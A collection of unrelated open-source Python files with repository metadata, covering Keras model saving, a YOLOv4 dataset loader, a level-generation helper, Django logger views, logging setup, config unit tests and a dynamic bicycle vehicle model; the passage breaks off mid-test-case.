kback.set_value(model.optimizer.lr, lr)
train_history = model.fit(x=train_x, y=train_y, validation_data=(validation_x, validation_y), batch_size=batch_size, epochs=epochs)
# H = model.fit(x=train_x, y=train_y, batch_size=batch_size, epochs=epochs)
return model, train_history
@classmethod
def save_model(cls, model, model_name):
try:
model.save(model_name)
except OSError:
# serialize model to JSON
model_json = model.to_json()
with open(model_name.replace('.h5', '.json'), 'w') as json_file:
json_file.write(model_json)
# serialize weights to HDF5
model.save_weights(model_name)
@classmethod
def load_model(cls, model_name):
if os.path.exists(model_name.replace('.h5', '.json')):
# load json and create model
json_file = open(model_name.replace('.h5', '.json'), 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = keras.models.model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights(model_name)
return loaded_model
else:
return keras.models.load_model(model_name)
| 40.093407 | 139 | 0.647252 | [
"MIT"
] | ufopcsilab/ECGClassification | python/qrs/qrs_net.py | 7,297 | Python |
"""
MIT License
Copyright (c) 2019 YangYun
Copyright (c) 2020 Việt Hùng
Copyright (c) 2020-2021 Hyeonki Hong <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from typing import List
import cv2
import numpy as np
from tensorflow.keras.utils import Sequence
from .augmentation import mosaic
from ...common import (
media,
convert_dataset_to_ground_truth as _convert_dataset_to_ground_truth,
)
from ...common.config import YOLOConfig
from ...common.parser import parse_dataset
_AUGMETATION_CACHE_SIZE = 50
class YOLODataset(Sequence):
def __init__(
self,
config: YOLOConfig,
dataset_list: str,
dataset_type: str = "converted_coco",
image_path_prefix: str = "",
training: bool = True,
):
self.dataset = parse_dataset(
dataset_list=dataset_list,
dataset_type=dataset_type,
image_path_prefix=image_path_prefix,
)
self._metayolos = []
if config.layer_count["yolo"] > 0:
for i in range(config.layer_count["yolo"]):
self._metayolos.append(config.find_metalayer("yolo", i))
elif config.layer_count["yolo_tpu"] > 0:
for i in range(config.layer_count["yolo_tpu"]):
self._metayolos.append(config.find_metalayer("yolo_tpu", i))
else:
raise RuntimeError(
"YOLODataset: model does not have a yolo or yolo_tpu layer"
)
self._metanet = config.net
self._metayolos_np = np.zeros(
(len(self._metayolos), 7 + len(self._metayolos[-1].mask)),
dtype=np.float32,
)
for i, metayolo in enumerate(self._metayolos):
self._metayolos_np[i, 0] = metayolo.height
self._metayolos_np[i, 1] = metayolo.width
self._metayolos_np[i, 2] = metayolo.channels
self._metayolos_np[i, 3] = metayolo.classes
self._metayolos_np[i, 4] = metayolo.label_smooth_eps
self._metayolos_np[i, 5] = metayolo.max
self._metayolos_np[i, 6] = metayolo.iou_thresh
for j, mask in enumerate(metayolo.mask):
self._metayolos_np[i, 7 + j] = mask
self._anchors_np = np.zeros(
len(self._metayolos[-1].anchors) * 2, dtype=np.float32
)
for i, anchor in enumerate(self._metayolos[-1].anchors):
self._anchors_np[2 * i] = anchor[0] / self._metanet.width
self._anchors_np[2 * i + 1] = anchor[1] / self._metanet.height
# Data augmentation ####################################################
self._augmentation: List[str] = []
if config.net.mosaic:
self._augmentation.append("mosaic")
if training and len(self._augmentation) > 0:
self._augmentation_batch = int(config.net.batch * 0.3)
self._training = True
else:
self._augmentation_batch = 0
self._training = False
self._augmentation_cache = [
self._get_dataset(i) for i in range(_AUGMETATION_CACHE_SIZE)
]
self._augmentation_cache_index = 0
def _convert_dataset_to_ground_truth(self, dataset_bboxes):
"""
@param `dataset_bboxes`: [[b_x, b_y, b_w, b_h, class_id], ...]
@return `groud_truth_one`:
[Dim(yolo.h, yolo.w, yolo.c + len(mask))] * len(yolo)
"""
return _convert_dataset_to_ground_truth(
dataset_bboxes, self._metayolos_np, self._anchors_np
)
def _convert_dataset_to_image_and_bboxes(self, dataset):
"""
@param dataset: [image_path, [[x, y, w, h, class_id], ...]]
@return image, bboxes
image: 0.0 ~ 1.0, Dim(1, height, width, channels)
"""
# pylint: disable=bare-except
try:
image = cv2.imread(dataset[0])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
except:
return None, None
resized_image, resized_bboxes = media.resize_image(
image,
target_shape=self._metanet.input_shape,
ground_truth=dataset[1],
)
resized_image = np.expand_dims(resized_image / 255.0, axis=0)
return resized_image, resized_bboxes
def _get_dataset(self, index: int):
offset = 0
for offset in range(5):
image, bboxes = self._convert_dataset_to_image_and_bboxes(
self.dataset[(index + offset) % len(self.dataset)]
)
if image is None:
offset += 1
else:
return image, bboxes
raise FileNotFoundError("Failed to find images")
def __getitem__(self, index):
"""
@return
`images`: Dim(batch, height, width, channels)
`groud_truth_one`:
[Dim(batch, yolo.h, yolo.w, yolo.c + len(mask))] * len(yolo)
"""
batch_x = []
# [[gt_one, gt_one, ...],
# [gt_one, gt_one, ...], ...]
batch_y = [[] for _ in range(len(self._metayolos))]
start_index = index * self._metanet.batch
for i in range(self._metanet.batch - self._augmentation_batch):
image, bboxes = self._get_dataset(start_index + i)
self._augmentation_cache[self._augmentation_cache_index] = (
image,
bboxes,
)
self._augmentation_cache_index = (
self._augmentation_cache_index + 1
) % _AUGMETATION_CACHE_SIZE
batch_x.append(image)
ground_truth = self._convert_dataset_to_ground_truth(bboxes)
for j in range(len(self._metayolos)):
batch_y[j].append(ground_truth[j])
for i in range(self._augmentation_batch):
augmentation = self._augmentation[
np.random.randint(0, len(self._augmentation))
]
image = None
bboxes = None
if augmentation == "mosaic":
image, bboxes = mosaic(
*[
self._augmentation_cache[
np.random.randint(
0,
_AUGMETATION_CACHE_SIZE,
)
]
for _ in range(4)
]
)
batch_x.append(image)
ground_truth = self._convert_dataset_to_ground_truth(bboxes)
for j in range(len(self._metayolos)):
batch_y[j].append(ground_truth[j])
return np.concatenate(batch_x, axis=0), [
np.stack(y, axis=0) for y in batch_y
]
def __len__(self):
return len(self.dataset) // (
self._metanet.batch - self._augmentation_batch
)
| 35.663636 | 80 | 0.590874 | [
"MIT"
] | fcakyon/tensorflow-yolov4 | py_src/yolov4/tf/dataset/keras_sequence.py | 7,849 | Python |
from amaru.utilities import constants
def generate_subsets(current_tree_bottom):
current_distances = []
subsets = []
current_point = 0
while current_point < len(current_tree_bottom) - 1:
current_distances.append(current_tree_bottom[current_point + 1][1] - current_tree_bottom[current_point][1])
current_point = current_point + 1
# remove similar splits causesd by floating point imprecision
for i in range(len(current_distances)):
current_distances[i] = round(current_distances[i], 10)
split_points = list(set(current_distances)) # all possible x-distances between bottom blocks
for i in split_points: # subsets based on differences between x-distances
current_subset = []
start_point = 0
end_point = 1
for j in current_distances:
if j >= i:
current_subset.append(current_tree_bottom[start_point:end_point])
start_point = end_point
end_point = end_point + 1
current_subset.append(current_tree_bottom[start_point:end_point])
subsets.append(current_subset)
subsets.append([current_tree_bottom])
return subsets
# finds the center positions of the given subset
def find_subset_center(subset):
if len(subset) % 2 == 1:
return subset[(len(subset) - 1) // 2][1]
else:
return (subset[len(subset) // 2][1] - subset[(len(subset) // 2) - 1][1]) / 2.0 + subset[(len(subset) // 2) - 1][
1]
# finds the edge positions of the given subset
def find_subset_edges(subset):
edge1 = subset[0][1] - (constants.blocks[str(subset[0][0])][0]) / 2.0 + constants.edge_buffer
edge2 = subset[-1][1] + (constants.blocks[str(subset[-1][0])][0]) / 2.0 - constants.edge_buffer
return [edge1, edge2]
| 33.962264 | 120 | 0.662222 | [
"BSD-3-Clause"
] | TeamSerpentine/angry-birds-level-gen-2020 | amaru/utilities/subsets.py | 1,800 | Python |
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from Logger.models import Run, Process
from Logger.libs import log_dealer
import json
# Create your views here.
def listen(request):
log_dealer(request)
context_dict = {}
response = render(request, 'index.html', context=context_dict)
return response
def show_run(request, runId):
context_dict = {}
try:
run = Run.objects.get(runId=runId)
procs = Process.objects.filter(runId=runId)
context_dict['processes'] = procs
context_dict['run'] = run
except Run.DoesNotExist:
context_dict['processes'] = None
context_dict['run'] = None
return render(request, 'run.html', context_dict)
def show_process(request, runId, h1, h2):
context_dict = {}
try:
uid = '/'.join([runId, h1, h2])
proc = Process.objects.get(uid=uid)
context_dict['process'] = proc
context_dict['script_lines'] = proc.script.split('\n')
except Run.DoesNotExist:
context_dict['process'] = None
return render(request, 'process.html', context_dict)
def index(request):
started_list = Run.objects.filter(runStatus='started').order_by('-startedDatetime')[:10]
success_list = Run.objects.filter(runStatus='success').order_by('-startedDatetime')[:10]
failed_list = Run.objects.filter(runStatus='failed').order_by('-startedDatetime')[:10]
context_dict = {'started':started_list, 'success':success_list, 'failed':failed_list}
return render(request, 'index.html', context_dict)
def search(request):
query = request.GET['q']
if '/' in query:
return HttpResponseRedirect("/")
else:
return HttpResponseRedirect(f"/run/{query}")
def about(request):
context_dict = {}
return render(request, 'about.html', context_dict)
| 27.880597 | 92 | 0.67773 | [
"MIT"
] | MenheraMikumo/Nextflow-Kanban | Logger/views.py | 1,868 | Python |
# MIT License
# Copyright (c) 2020 Simon Schug, João Sacramento
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import os
import time
from importlib import reload
import torch
# Global variables
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
log_dir = None
log_name = None
writer = None
def setup_logging(name, dir=""):
"""
Setup the logging device to log into a uniquely created directory.
Args:
name: Name of the directory for the log-files.
dir: Optional sub-directory within log
"""
# Setup global log name and directory
global log_name
log_name = name
# Setup global logging directory
global log_dir
log_dir = os.path.join("log", dir)
# Create the logging folder if it does not exist already
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
# Need to reload logging as otherwise the logger might be captured by another library
reload(logging)
# Setup global logger
logging.basicConfig(
level=logging.INFO,
format="[%(levelname)-5.5s %(asctime)s] %(message)s",
datefmt='%H:%M:%S',
handlers=[
logging.FileHandler(os.path.join(
log_dir, time.strftime("%Y%m%d_%H%M") + "_" + name + ".log")
),
logging.StreamHandler()
])
| 33.253521 | 89 | 0.703939 | [
"MIT"
] | SudeepSarkar/equilibrium-propagation | lib/config.py | 2,362 | Python |
'''
Created on Feb 4, 2021
@author: paepcke
'''
import io
import os
import pickle
import tempfile
import unittest
from experiment_manager.neural_net_config import NeuralNetConfig
#from experiment_manager.dottable_config import DottableConfigParser
TEST_ALL = True
#TEST_ALL = False
class NeuralNetConfigTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.curr_dir = os.path.dirname(__file__)
def setUp(self):
cfg_file = os.path.join(os.path.dirname(__file__),
'dottable_config_tst.cfg')
self.cfg_arr_file = os.path.join(os.path.dirname(__file__),
'neural_net_config_arrays_tst.cfg')
self.config = NeuralNetConfig(cfg_file)
complete_cfg_file = os.path.join(os.path.dirname(__file__),
'../../tests',
'bird_trainer_tst.cfg')
self.complete_config = NeuralNetConfig(complete_cfg_file)
def tearDown(self):
pass
# ------------ Tests -----------
#------------------------------------
# test_add_section
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_add_section(self):
self.config.add_section('FoodleDoodle')
secs = self.config.sections()
self.assertIn('FoodleDoodle', secs)
self.assertEqual(len(self.config.FoodleDoodle), 0)
self.assertEqual(len(self.config['FoodleDoodle']), 0)
self.config.FoodleDoodle = 10
self.assertEqual(self.config.FoodleDoodle, 10)
self.assertEqual(self.config['FoodleDoodle'], 10)
#------------------------------------
# test_setter_evals
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_setter_evals(self):
# A non-neural-net name:
self.config.foo = 10
self.assertEqual(self.config.foo, 10)
self.assertEqual(self.config['foo'], 10)
# A nn-special parameter:
self.config.batch_size = 128
self.assertEqual(self.config.Training.batch_size, 128)
self.assertEqual(self.config.Training['batch_size'], 128)
self.config.Training.optimizer = 'foo_opt'
self.assertEqual(self.config.Training.optimizer, 'foo_opt')
#------------------------------------
# test_setter_methods
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_setter_methods(self):
#****self.config.net_name = 'Foobar'
self.config.set_net_name('Foobar')
self.assertEqual(self.config.Training.net_name, 'Foobar')
# Wrong type for epoch:
with self.assertRaises(AssertionError):
self.config.set_min_epochs('foo')
# min_epoch > max_epoch:
self.config.set_max_epochs(10)
with self.assertRaises(AssertionError):
self.config.set_min_epochs('20')
self.config.set_batch_size(32)
self.assertEqual(self.config.Training.batch_size, 32)
with self.assertRaises(AssertionError):
self.config.set_batch_size(-20)
self.assertEqual(self.config.Training.batch_size, 32)
with self.assertRaises(AssertionError):
self.config.set_num_folds(-20)
with self.assertRaises(AssertionError):
self.config.set_all_procs_log(-20)
self.config.set_all_procs_log(True)
self.assertTrue(self.config.Parallelism.all_procs_log)
#------------------------------------
# test_eq
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_eq(self):
self.assertTrue(self.config == self.config)
# Copies of a NeuralNetConfig instance
# shouldn't be (content-wise) equal to
# the original:
conf_copy = self.config.copy()
self.assertTrue(conf_copy == self.config)
# But if we add a section to the copy
# (and not to the original)...:
conf_copy.add_section('TestSection')
# ... copy and original should no longer
# be equal:
self.assertTrue(conf_copy != self.config)
# Check that TestSection was indeed added
# to the copy, but not simultaneously to the
# original (via residually shared data structs):
self.assertEqual(sorted(conf_copy.sections()),
sorted(['Paths', 'Training', 'Parallelism', 'TestSection'])
)
self.assertEqual(sorted(self.config.sections()),
sorted(['Paths', 'Training', 'Parallelism'])
)
#------------------------------------
# test_to_json_xc_recording
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_to_json_xc_recording(self):
json_str = self.config.to_json()
expected = '{"Paths": {"my_path": "/foo/bar.txt", "roots": "[/foo/bar.txt, blue.jpg, 10, 3.14]", "toots": "/foo/bar.txt, blue.jpg, 10, 3.14"}, "Training": {"train_str": "resnet18", "train_int": "5", "train_float": "3.14159", "train_yes": "yes", "train_yescap": "Yes", "train_1": "1", "train_on": "On", "train_no": "no", "train_0": "0", "train_off": "off"}, "Parallelism": {}}'
self.assertEqual(json_str, expected)
str_stream = io.StringIO()
full_stream = self.config.to_json(str_stream)
expected = full_stream.getvalue()
self.assertEqual(json_str, expected)
# For writing to file, use a temp file
# that is destroyed when closed:
try:
tmp_file = tempfile.NamedTemporaryFile(dir=self.curr_dir,
suffix='.json',
delete=False
)
tmp_file.close()
with open(tmp_file.name, 'w') as fd:
fd.write('foobar')
with self.assertRaises(FileExistsError):
self.config.to_json(tmp_file.name)
finally:
tmp_file.close()
os.remove(tmp_file.name)
try:
tmp_file = tempfile.NamedTemporaryFile(dir=self.curr_dir,
suffix='.json',
delete=False
)
tmp_file.close()
self.config.to_json(tmp_file.name,
check_file_exists=False
)
finally:
tmp_file.close()
os.remove(tmp_file.name)
#------------------------------------
# test_from_json
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_from_json(self):
json_str = self.config.to_json()
new_inst = NeuralNetConfig.json_loads(json_str)
self.assertTrue(new_inst == self.config)
#------------------------------------
# test_json_human_readable
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_json_human_readable(self):
json_str = self.complete_config.to_json()
human_str = NeuralNetConfig.json_human_readable(json_str)
print(human_str)
#------------------------------------
# test_arrays
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_arrays(self):
config = NeuralNetConfig(self.cfg_arr_file)
arr1 = config.getarray('Training', 'arr1', 'foo')
expected = ['1', "'foo'", '[10', 'bluebell]']
self.assertListEqual(arr1, expected)
arr2 = config.getarray('Training', 'arr2', 'foo')
self.assertEqual(len(arr2),10)
expected = ['BANAG', 'BBFLG', 'BCMMG', 'BHPAG', 'BHTAG',
'BTSAC', 'BTSAS', 'CCROC', 'CCROS', 'CFPAG'
]
self.assertListEqual(arr2, expected)
#------------------------------------
# test_pickling
#-------------------
@unittest.skipIf(TEST_ALL != True, 'skipping temporarily')
def test_pickling(self):
config = NeuralNetConfig(self.cfg_arr_file)
new_config = pickle.loads(pickle.dumps(config))
self.assertEqual(config, new_config)
# -------------- Main -----------------
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 35.294821 | 384 | 0.53076 | [
"BSD-3-Clause"
] | paepcke/ml_experiment_manager | src/experiment_manager/tests/test_neural_net_config.py | 8,859 | Python |
""" Dynamic bicycle model.
Use Dynamic class to:
1. simulate continuous model
2. linearize continuous model
3. discretize continuous model
4. simulate continuously linearized discrete model
5. compare continuous and discrete models
"""
__author__ = 'Achin Jain'
__email__ = '[email protected]'
import numpy as np
import casadi as cs
from bayes_race.models.model import Model
from bayes_race.params import F110
class Dynamic(Model):
def __init__(self, lf, lr, mass, Iz, Cf, Cr,
Bf=None, Br=None, Df=None, Dr=None,
Cm1=None, Cm2=None, Cr0=None, Cr2=None,
input_acc=False, **kwargs):
""" specify model params here
"""
self.lf = lf
self.lr = lr
self.dr = lr/(lf+lr)
self.mass = mass
self.Iz = Iz
self.Cf = Cf
self.Cr = Cr
self.Bf = Bf
self.Br = Br
self.Df = Df
self.Dr = Dr
self.Cm1 = Cm1
self.Cm2 = Cm2
self.Cr0 = Cr0
self.Cr2 = Cr2
self.approx = False
if Bf is None or Br is None or Df is None or Dr is None:
self.approx = True
self.input_acc = input_acc
self.n_states = 6
self.n_inputs = 2
Model.__init__(self)
def sim_continuous(self, x0, u, t):
""" simulates the nonlinear continuous model with given input vector
by numerical integration using 6th order Runge Kutta method
x0 is the initial state of size 6x1
u is the input vector of size 2xn
t is the time vector of size 1x(n+1)
"""
n_steps = u.shape[1]
x = np.zeros([6, n_steps+1])
dxdt = np.zeros([6, n_steps+1])
dxdt[:,0] = self._diffequation(None, x0, [0, 0])
x[:,0] = x0
for ids in range(1, n_steps+1):
x[:,ids] = self._integrate(x[:,ids-1], u[:,ids-1], t[ids-1], t[ids])
dxdt[:,ids] = self._diffequation(None, x[:,ids], u[:,ids-1])
return x, dxdt
def _diffequation(self, t, x, u):
""" write dynamics as first order ODE: dxdt = f(x(t))
x is a 6x1 vector: [x, y, psi, vx, vy, omega]^T
u is a 2x1 vector: [acc/pwm, steer]^T
"""
steer = u[1]
psi = x[2]
vx = x[3]
vy = x[4]
omega = x[5]
Ffy, Frx, Fry = self.calc_forces(x, u)
dxdt = np.zeros(6)
dxdt[0] = vx*np.cos(psi) - vy*np.sin(psi)
dxdt[1] = vx*np.sin(psi) + vy*np.cos(psi)
dxdt[2] = omega
dxdt[3] = 1/self.mass * (Frx - Ffy*np.sin(steer)) + vy*omega
dxdt[4] = 1/self.mass * (Fry + Ffy*np.cos(steer)) - vx*omega
dxdt[5] = 1/self.Iz * (Ffy*self.lf*np.cos(steer) - Fry*self.lr)
return dxdt
def calc_forces(self, x, u, return_slip=False):
steer = u[1]
psi = x[2]
vx = x[3]
vy = x[4]
omega = x[5]
if self.approx:
# rolling friction and drag are ignored
acc = u[0]
Frx = self.mass*acc
# See Vehicle Dynamics and Control (Rajamani)
alphaf = steer - (self.lf*omega + vy)/vx
alphar = (self.lr*omega - vy)/vx
Ffy = 2 * self.Cf * alphaf
Fry = 2 * self.Cr * alphar
else:
if self.input_acc:
# rolling friction and drag are ignored
acc = u[0]
Frx = self.mass*acc
else:
# rolling friction and drag are modeled
pwm = u[0]
Frx = (self.Cm1-self.Cm2*vx)*pwm - self.Cr0 - self.Cr2*(vx**2)
alphaf = steer - np.arctan2((self.lf*omega + vy), abs(vx))
alphar = np.arctan2((self.lr*omega - vy), abs(vx))
Ffy = self.Df * np.sin(self.Cf * np.arctan(self.Bf * alphaf))
Fry = self.Dr * np.sin(self.Cr * np.arctan(self.Br * alphar))
if return_slip:
return Ffy, Frx, Fry, alphaf, alphar
else:
return Ffy, Frx, Fry
def casadi(self, x, u, dxdt):
""" write dynamics as first order ODE: dxdt = f(x(t))
x is a 6x1 vector: [x, y, psi, vx, vy, omega]^T
u is a 2x1 vector: [acc/pwm, steer]^T
dxdt is a casadi.SX variable
"""
pwm = u[0]
steer = u[1]
psi = x[2]
vx = x[3]
vy = x[4]
omega = x[5]
vmin = 0.05
vy = cs.if_else(vx<vmin, 0, vy)
omega = cs.if_else(vx<vmin, 0, omega)
steer = cs.if_else(vx<vmin, 0, steer)
vx = cs.if_else(vx<vmin, vmin, vx)
Frx = (self.Cm1-self.Cm2*vx)*pwm - self.Cr0 - self.Cr2*(vx**2)
alphaf = steer - cs.atan2((self.lf*omega + vy), vx)
alphar = cs.atan2((self.lr*omega - vy), vx)
Ffy = self.Df * cs.sin(self.Cf * cs.arctan(self.Bf * alphaf))
Fry = self.Dr * cs.sin(self.Cr * cs.arctan(self.Br * alphar))
dxdt[0] = vx*cs.cos(psi) - vy*cs.sin(psi)
dxdt[1] = vx*cs.sin(psi) + vy*cs.cos(psi)
dxdt[2] = omega
dxdt[3] = 1/self.mass * (Frx - Ffy*cs.sin(steer)) + vy*omega
dxdt[4] = 1/self.mass * (Fry + Ffy*cs.cos(steer)) - vx*omega
dxdt[5] = 1/self.Iz * (Ffy*self.lf*cs.cos(steer) - Fry*self.lr)
return dxdt
def sim_discrete(self, x0, u, Ts):
""" simulates a continuously linearized discrete model
u is the input vector of size 2xn
Ts is the sampling time
"""
n_steps = u.shape[1]
x = np.zeros([6, n_steps+1])
dxdt = np.zeros([6, n_steps+1])
dxdt[:,0] = self._diffequation(None, x0, [0, 0])
x[:,0] = x0
for ids in range(1, n_steps+1):
g = self._diffequation(None, x[:,ids-1], u[:,ids-1]).reshape(-1,)
x[:,ids] = x[:,ids-1] + g*Ts
dxdt[:,ids] = self._diffequation(None, x[:,ids], u[:,ids-1])
return x, dxdt
def linearize(self, x0, u0):
""" linearize at a given x0, u0
for a given continuous system dxdt = f(x(t))
calculate A = ∂f/∂x, B = ∂f/∂u, g = f evaluated at x0, u0
A is 6x6, B is 6x2, g is 6x1
"""
steer = u0[1]
psi = x0[2]
vx = x0[3]
vy = x0[4]
omega = x0[5]
# numerical correction for low speeds
vmin = 0.05
if vx < vmin:
vy = 0
omega = 0
steer = 0
vx = vmin
sindelta = np.sin(steer)
cosdelta = np.cos(steer)
sinpsi = np.sin(psi)
cospsi = np.cos(psi)
Ffy, Frx, Fry, alphaf, alphar = self.calc_forces(x0, u0, return_slip=True)
if self.approx:
dFfy_dvx = 2 * self.Cf * (self.lf*omega + vy)/((self.lf*omega + vy)**2 + vx**2)
dFfy_dvy = -2 * self.Cf * vx/((self.lf*omega + vy)**2 + vx**2)
dFfy_domega = -2 * self.Cf * self.lf * vx/((self.lf*omega + vy)**2 + vx**2)
dFrx_dvx = 0
dFrx_dvu1 = 1
dFry_dvx = -2 * self.Cr * (self.lr*omega - vy)/((self.lr*omega - vy)**2 + vx**2)
dFry_dvy = -2 * self.Cr * vx/((self.lr*omega - vy)**2 + vx**2)
dFry_domega = 2 * self.Cr * self.lr * vx/((self.lr*omega - vy)**2 + vx**2)
dFfy_delta = 2*self.Cf
else:
dFfy_dalphaf = self.Bf * self.Cf * self.Df * np.cos(self.Cf * np.arctan(self.Bf * alphaf))
dFfy_dalphaf *= 1/(1+(self.Bf*alphaf)**2)
dFry_dalphar = self.Br * self.Cr * self.Dr * np.cos(self.Cr * np.arctan(self.Br * alphar))
dFry_dalphar *= 1/(1+(self.Br*alphar)**2)
dFfy_dvx = dFfy_dalphaf * (self.lf*omega + vy)/((self.lf*omega + vy)**2 + vx**2)
dFfy_dvy = -dFfy_dalphaf * vx/((self.lf*omega + vy)**2 + vx**2)
dFfy_domega = -dFfy_dalphaf * self.lf * vx/((self.lf*omega + vy)**2 + vx**2)
if self.input_acc:
raise NotImplementedError
pwm = u0[0]
dFrx_dvx = -self.Cm2*pwm - 2*self.Cr2*vx
dFrx_dvu1 = self.Cm1-self.Cm2*vx
dFry_dvx = -dFry_dalphar * (self.lr*omega - vy)/((self.lr*omega - vy)**2 + vx**2)
dFry_dvy = -dFry_dalphar * vx/((self.lr*omega - vy)**2 + vx**2)
dFry_domega = dFry_dalphar * self.lr * vx/((self.lr*omega - vy)**2 + vx**2)
dFfy_delta = dFfy_dalphaf
f1_psi = -vx*sinpsi-vy*cospsi
f1_vx = cospsi
f1_vy = -sinpsi
f2_psi = vx*cospsi-vy*sinpsi
f2_vx = sinpsi
f2_vy = cospsi
f4_vx = 1/self.mass * (dFrx_dvx -dFfy_dvx*sindelta)
f4_vy = 1/self.mass * (-dFfy_dvy*sindelta + self.mass*omega)
f4_omega = 1/self.mass * (-dFfy_domega*sindelta + self.mass*vy)
f5_vx = 1/self.mass * (dFry_dvx + dFfy_dvx*cosdelta - self.mass*omega)
f5_vy = 1/self.mass * (dFry_dvy + dFfy_dvy*cosdelta)
f5_omega = 1/self.mass * (dFry_domega + dFfy_domega*cosdelta - self.mass*vx)
f6_vx = 1/self.Iz * (dFfy_dvx*self.lf*cosdelta - dFry_dvx*self.lr)
f6_vy = 1/self.Iz * (dFfy_dvy*self.lf*cosdelta - dFry_dvy*self.lr)
f6_omega = 1/self.Iz * (dFfy_domega*self.lf*cosdelta - dFry_domega*self.lr)
f4_u1 = dFrx_dvu1
f4_delta = 1/self.mass * (-dFfy_delta*sindelta - Ffy*cosdelta)
f5_delta = 1/self.mass * (dFfy_delta*cosdelta - Ffy*sindelta)
f6_delta = 1/self.Iz * (dFfy_delta*self.lf*cosdelta - Ffy*self.lf*sindelta)
A = np.array([
[0, 0, f1_psi, f1_vx, f1_vy, 0],
[0, 0, f2_psi, f2_vx, f2_vy, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, f4_vx, f4_vy, f4_omega],
[0, 0, 0, f5_vx, f5_vy, f5_omega],
[0, 0, 0, f6_vx, f6_vy, f6_omega],
])
B = np.array([
[0, 0],
[0, 0],
[0, 0],
[f4_u1, f4_delta],
[0, f5_delta],
[0, f6_delta],
])
g = self._diffequation(None, x0, u0).reshape(-1,)
return A, B, g
if __name__ == '__main__':
""" test cases 1-3 use 4 states continuous model
test cases 4-6 use 4 states discrete model
test pairs (1,4), (2,5) and (3,6) should give same results
"""
# vehicle parameters for F1/10
params = F110()
model = Dynamic(**params)
test_case = 3
#####################################################################
# CONTINUOUS MODEL 6 STATES
# start at origin with init velocity [3, 3] m/s
# apply constant acceleration 1 m/s^2 for 1s and then move at constant speed
if test_case == 1:
n_steps = 100
inputs = np.zeros([2, n_steps])
time = np.linspace(0, 2, n_steps+1)
inputs[0,:50] = 1
x_init = np.array([0, 0, np.pi/4, 3*np.sqrt(2), 0, 0])
x_cont, dxdt_cont = model.sim_continuous(x_init, inputs, time)
model.plot_results(time, x_cont, dxdt_cont, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad
if test_case == 2:
n_steps = 200
inputs = np.zeros([2, n_steps])
time = np.linspace(0, 4, n_steps+1)
inputs[1,:] = 0.2
x_init = np.array([0, 0, 0, 3, 0, 0])
x_cont, dxdt_cont = model.sim_continuous(x_init, inputs, time)
model.plot_results(time, x_cont, dxdt_cont, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad after 2 sec
if test_case == 3:
n_steps = 400
inputs = np.zeros([2, n_steps])
inputs[1,100:] = 0.2
time = np.linspace(0, 8, n_steps+1)
x_init = np.array([0, 0, 0, 3, 0, 0])
x_cont, dxdt_cont = model.sim_continuous(x_init, inputs, time)
model.plot_results(time, x_cont, dxdt_cont, inputs)
#####################################################################
# DISCRETE MODEL 6 STATES
# start at origin with init velocity [3, 3] m/s
# apply constant acceleration 1 m/s^2 for 1s and then move at constant speed
if test_case == 4:
Ts = 0.02
n_steps = int(2/Ts)
inputs = np.zeros([2, n_steps])
time = np.linspace(0, n_steps+1, n_steps+1)*Ts
inputs[0,:int(n_steps/2)] = 1
x_init = np.array([0, 0, np.pi/4, 3*np.sqrt(2), 0, 0])
x_disc, dxdt_disc = model.sim_discrete(x_init, inputs, Ts)
model.plot_results(time, x_disc, dxdt_disc, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad
if test_case == 5:
Ts = 0.02
n_steps = int(4/Ts)
